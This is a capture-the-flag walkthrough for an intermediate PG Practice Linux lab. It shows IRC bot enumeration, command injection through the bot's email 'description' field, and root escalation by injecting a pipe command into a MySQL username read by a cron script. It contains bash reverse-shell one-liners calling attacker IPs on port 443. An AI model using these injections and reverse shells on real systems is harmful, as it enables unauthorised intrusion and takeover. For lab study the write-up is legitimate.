Linux Machine, PG Practice, IP 192.168.159.160, Intermediate
TL;DR
- Port 6667 is hosting an IRC server, try to use privmsg command to talk to the bot
- /opt/check_mailpass_expiration.sh file could be used for privilege escalation
Initial Enumeration
Open ports: 22, 25, 80, 6667, 8080
- 80 and 8080 are just there to waste your time, not important
- 6667 is the IRC server, check https://book.hacktricks.xyz/network-services-pentesting/pentesting-irc for more information
Initial Foothold
Using netcat to connect port 6667, register and then use LIST command we’ll see #mailAssistant channel
- USER ran213eqdw123 0 * ran213eqdw123
- NICK ran213eqdw123
- LIST
Now, here comes the key point, at the hacktricks.xyz, they didn’t list you could use privmsg method to communicate with the #mailAssistant channel. Instead, they offer you a Wikipedia page which contains all the IRC commands, it took me a while to realize that privmsg is the command to use.
Here privmsg #mailAssistant hello showed us there is a spaghetti_BoT for us to further communicate with !command option.
We could send email to that bot, but before that we could use !about to see more information
It turned out that there is a source code available at the github.
Inspecting the source code, we see that it is possible to inject commands into the sending email commands to the spaghetti_bot.
- The “body” parameter is where we inject the commands, at the IRC command lines, it should be the “description”.
privmsg spaghetti_BoT email:[email protected] description:test;/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.155/443 0>&1'
successfully got the the initial foothold.
Privilege Escalation
This part took me a while, after using pspy I found that the root user is constantly calling for /opt/check_mailpass_expiration.sh script
To take a look of the file itself
#!/bin/bash
#Adapt to your setup
POSTFIX_DB="postfixadmin"
MYSQL_CREDENTIALS_FILE="/root/postfixadmin.my.cnf"
[email protected]
# Change this list to change notification times and when ...
for INTERVAL in 30 14 7
do
LOWER=$(( $INTERVAL - 1 ))
QUERY="SELECT username,password_expiry FROM mailbox WHERE password_expiry > now() + interval $LOWER DAY AND password_expiry < NOW() + interval $INTERVAL DAY"
mysql --defaults-extra-file="$MYSQL_CREDENTIALS_FILE" "$POSTFIX_DB" -B -e "$QUERY" | while read -a RESULT ; do
echo -e "Dear User, \n Your password will expire on ${RESULT[1]}" | mail -s "Password 30 days before expiration notication" -r $REPLY_ADDRESS ${RESULT[0]}
done
doneIt looks like we could inject our code again at ${RESULT[0] part, which is the username in the query’s output. The password_expiry value has to be smaller then now() + interval $INTERVAL
But The credential file is at the /root directory, which we don’t have access, but we could find it at /var/www folder, it is in a config file, which I don’t remember its name anymore, and my raw notes didn’t keep the file’s name, sorry that I cracked this box like 3 weeks ago. Life is being too busy for me to write a walkthrough immediately after I crack it. But I did keep a screenshot of the credential, which is as follow
Now we could log into the server using
- mysql -h 127.0.0.1 -u postfixadmin -p
- provide the password when prompt
- Update the mailbox’s password_expiry to now() + interval 7 days ( update mailbox set password_expiry = (select now() + interval 7 day); )
- Update the username to your reverse shell file, I tried to update it to a one line reverse shell directly, not working that way. (UPDATE mailbox SET username= ‘|/tmp/bd.sh’ WHERE domain=’private.lan’;)
- Create a reverse shell file anywhere you want, I picked /tmp/bd.sh, in the /tmp/bd.sh, I have
#!/bin/bash
/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.170/443 0>&1'
Ready your netcat listener, we should get a signal back from root in a minute maximumly, If you didn’t get the reverse shell in a minute, that means something is not right as this /opt/check_mailpass_expiration.sh is getting called once a minute.